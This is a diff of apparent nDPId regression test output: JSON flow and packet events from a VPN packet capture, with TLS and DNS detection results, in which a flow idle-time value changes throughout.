-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1569687259694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687259694,"pkt":"LH6BsEqhNDY7z3UoCABFAAAo3\/wAAEAGn4oKAADjuBk4Td5VAFBor5ytCT1EPVAQEAlzBQAA"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1569687259694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687259694,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoLkYAAEAGUUEKAADjuBk4Td40AFBjyKiAGk9l7lAQEAA5gAAA"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1569687259694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687259694,"pkt":"LH6BsEqhNDY7z3UoCABFAAAo3\/wAAEAGn4oKAADjuBk4Td5VAFBor5ytCT1EPVAQEAlzBQAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1569687259694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687259694,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoLkYAAEAGUUEKAADjuBk4Td40AFBjyKiAGk9l7lAQEAA5gAAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1569687260293,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687260293,"pkt":"AQBeAAACGIEORo7ICABGAAAgPP4AAAEC\/QIKAADV4AAAApQEAAAXAAgE4AAA+w=="} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1569687260293,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687260293,"pkt":"AQBeAAD7GIEORo7ICABGAAAgpGYAAAEClKEKAADV4AAA+5QEAAAWAAkE4AAA+w=="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260469,"flow_last_seen":1569687260469,"flow_idle_time":7440000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":1,"thread_ts_msec":1569687260469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1569687260469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1569687260469,"pkt":"LH6BsEqhNDY7z3UoCABFAABaAABAAEAGj+kKAADjI8l8Cd5OAbsN94yysPePlIAYEACJPAAAAQEIChwNtRgGQIQkFwMDACEAAAAAAAAAA3VW6sM2CHDT\/Oy2e1MF3bFmEvrGQamtRJY="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1569687260489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260489,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0Bk0AAHoGj8IjyXwJCgAA4wG73k6w94+UDfeM2IAQAPROCgAAAQEICgZA6j4cDbUY"} -00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1569687260521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569687260521,"pkt":"NDY7z3UoLH6BsEqhCABFAABUBk4AAHoGj6EjyXwJCgAA4wG73k6w94+UDfeM2IAYAPS6xgAAAQEICgZA6l4cDbUYFwMDABsAAAAAAAAABNY2znqkTRgDlTqE63fXsBbyQmM="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260591,"flow_last_seen":1569687260591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687260591,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569687260591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260591,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGxu4KAADjCCVgwt5ZEL8UzEFoAAAAALAC\/\/+sRwAAAgQFtAEDAwUBAQgKHA21kQAAAAAEAgAA"} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569687260620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260620,"pkt":"NDY7z3UoLH6BsEqhCABFAABAE+xAAPEGAgIIJWDCCgAA4xC\/3lkWZHs7FMxBabASECzSsgAAAgQFZAEDAwIBAQgKeKa\/ZBwNtZEEAgAA"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569687260620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260620,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGxvoKAADjCCVgwt5ZEL8UzEFpFmR7PIAQEAgSNwAAAQEIChwNta14pr9k"} -01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260591,"flow_last_seen":1569687260620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687260620,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01559{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687260591,"flow_last_seen":1569687260667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1308,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1569687260667,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"e54965894d6b45ecb4323c7ea3d6c115","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","subjectDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","fingerprint":"86:2A:47:EF:00:68:79:60:7F:94:E2:91:6F:E0:38:82:37:8A:8E:2E"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260469,"flow_last_seen":1569687260469,"flow_idle_time":7560000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":1,"thread_ts_msec":1569687260469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1569687260469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1569687260469,"pkt":"LH6BsEqhNDY7z3UoCABFAABaAABAAEAGj+kKAADjI8l8Cd5OAbsN94yysPePlIAYEACJPAAAAQEIChwNtRgGQIQkFwMDACEAAAAAAAAAA3VW6sM2CHDT\/Oy2e1MF3bFmEvrGQamtRJY="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1569687260489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260489,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0Bk0AAHoGj8IjyXwJCgAA4wG73k6w94+UDfeM2IAQAPROCgAAAQEICgZA6j4cDbUY"} +00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1569687260521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569687260521,"pkt":"NDY7z3UoLH6BsEqhCABFAABUBk4AAHoGj6EjyXwJCgAA4wG73k6w94+UDfeM2IAYAPS6xgAAAQEICgZA6l4cDbUYFwMDABsAAAAAAAAABNY2znqkTRgDlTqE63fXsBbyQmM="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260591,"flow_last_seen":1569687260591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687260591,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569687260591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260591,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGxu4KAADjCCVgwt5ZEL8UzEFoAAAAALAC\/\/+sRwAAAgQFtAEDAwUBAQgKHA21kQAAAAAEAgAA"} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569687260620,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260620,"pkt":"NDY7z3UoLH6BsEqhCABFAABAE+xAAPEGAgIIJWDCCgAA4xC\/3lkWZHs7FMxBabASECzSsgAAAgQFZAEDAwIBAQgKeKa\/ZBwNtZEEAgAA"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569687260620,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260620,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGxvoKAADjCCVgwt5ZEL8UzEFpFmR7PIAQEAgSNwAAAQEIChwNta14pr9k"} +01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260591,"flow_last_seen":1569687260620,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687260620,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01559{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687260591,"flow_last_seen":1569687260667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1308,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1569687260667,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"e54965894d6b45ecb4323c7ea3d6c115","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","subjectDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","fingerprint":"86:2A:47:EF:00:68:79:60:7F:94:E2:91:6F:E0:38:82:37:8A:8E:2E"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1569687260751,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569687260751,"pkt":"LH6BsEqhNDY7z3UoCABFAABXLuMAAP8R6zkKAADjS0tLS\/3MADUAQ49kJ8YBAAABAAAAAAAAAmxiB19kbnMtc2QEX3VkcAEwAzEyOAIyOAMxNzIHaW4tYWRkcgRhcnBhAAAMAAE="} 00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.128.28.172.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -167,42 +167,42 @@ 00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261485,"flow_last_seen":1569687261501,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687261501,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1569687261506,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1569687261506,"pkt":"NDY7z3UoLH6BsEqhCABFAACDAABAADoRnvFLS0tLCgAA4wA13rkAbznpXq+BgwABAAAAAQAADUxQLVJLRVJVUi1PU1gEaHNkMQJjYQdjb21jYXN0A25ldAAAHAABwBoABgABAAAcIAAoBmRuczEwMcAiCGRuc2FkbWluwCIBawJtAAAcIAAADhAACTqAAAAcIA=="} 00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":226,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687261506,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687262866,"flow_last_seen":1569687262866,"flow_idle_time":7440000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1569687262866,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1569687262866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAABEAABAAEAGYVoKAADjot4rmd4xAbu3QBvT9S8yS4AYEAD8CwAAAQEIChwNvkTkAuRNDi2ISqeLxJuBXTMcrWivnw=="} -00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1569687262866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAAEWAABAAEAGYIgKAADjot4rmd4xAbu3QBvj9S8yS4AYEACf4gAAAQEIChwNvkTkAuRNC2FzYPnyOhEIxzv9HgAAAQAAAAAABf0HAAAAAAAAAFYAAAAAABO4pgAAAfJ1AAAAGzdZOcQAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAAEjynVwAAAAAACz6PAAAAAABmQ+JAyo3EgU6LQwAAAAAAAAAAAAAACK7duMsBAQAAAAELYXNg+fI6EQjHO\/0eAAABAAAAAAAF\/QcAAAAAAAAAVgAAAAAAE7imAAAB8nUAAAAbN1k5xAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAAAASPKdXAAAAAAALPo8AAAAAAAAAAQ=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1569687262866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAABEAABAAEAGYVoKAADjot4rmd4xAbu3QBzF9S8yS4AYEABLrAAAAQEIChwNvkTkAuRNchVP5mraMf5Tgny7zRbHZQ=="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267035,"flow_last_seen":1569687267035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687267035,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1569687267035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687267035,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95hAbsGNnxMAAAAALAC\/\/9wfAAAAgQFtAEDAwUBAQgKHA3OcQAAAAAEAgAA"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1569687267077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687267077,"pkt":"NDY7z3UoLH6BsEqhCABFAAA47VEAAPcGXQsIJWZbCgAA4wG73mHOEwD1BjZ8TZASgABbLAAAAgQFtAEBCAo\/+a5OHA3OcQ=="} 